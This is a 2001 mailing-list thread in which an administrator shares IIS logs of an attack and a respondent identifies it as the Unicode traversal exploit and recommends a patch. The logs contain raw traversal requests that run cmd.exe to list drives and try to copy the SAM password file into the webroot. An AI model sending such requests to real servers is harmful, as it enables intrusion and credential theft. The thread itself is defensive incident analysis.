Security Incidents mailing list archives
Re: IIS Unicode attack decode
From: "Portnoy, Gary" <gportnoy () BELENOSINC COM>
Date: Tue, 20 Mar 2001 12:57:15 -0500
Robert,

This indeed is the IIS Unicode exploit. Looks like an automatic tool based on the quick succession of the requests initially, but then they slow down, and the attacker has to stop and think, as things don't go exactly as he planned.

Notice that some GETs returned the code of 200, meaning he was able to successfully obtain the directory structure of your c and d drives, as well as c:\winnt and some others. You also have an executable _vti_bin directory, which signifies to the attacker that you have FrontPage installed. He could exploit some FrontPage vulnerabilities.

You are right, he wasn't able to obtain sam._ from the repair directory due to permissions, but from what it looks like your webroot is on c drive, so he/she can now run any executable in the winnt directory, unless IUSR_computername is denied access to them. That's all they need to turn your computer into a warez site, as was detailed in postings by Ron Grove from 2/24/01 to the incidents list. That generated quite a discussion, so check it out...

You probably need to load MS patch Q277873
http://www.microsoft.com/technet/security/bulletin/MS00-086.asp

-Gary-

Gary Portnoy
Network Administrator
gportnoy () belenosinc com
PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C
-----Original Message-----
From: ROBERT DEMAIN [mailto:rdemain () RM COM]
Sent: Tuesday, March 20, 2001 9:56 AM
To: INCIDENTS () SECURITYFOCUS COM
Subject: IIS Unicode attack decode

Hello All,

Recently I've been seeing quite a few attempts from the same Russian IP trying to send Unicode commands to a web server. These attacks were picked up by an IDS. Below are extracts from the log file on the web server.

My understanding of what has happened here is as follows:

- attacker tries a few attempts at doing a dir listing of c: and d:
- attacker tries to copy important stuff from the \repair directory to c:\inetpub\wwwroot (most unfriendly)
- attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not sure what this is about

Putting it all together, it seems the attacker tried to use the IIS 4 and 5 Unicode exploit to copy the SAM file to a place where he/she/it thought they could get it from (on this server c:\inetpub\wwwroot is not the default web site or anything, but I believe it is on a default IIS install). This failed for two main reasons:

1. the iusr_servername account (which is the user account this exploit can run as - correct me if I'm wrong) does not have permissions on \repair
2. the copy of the file to c:\inetpub\wwwroot would also fail as iusr_servername would not have the rights.

Anyone have any comments on this? Anyone else seen activity like this?
Regards
Rob

2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\AdminScripts\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\wwwroot\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)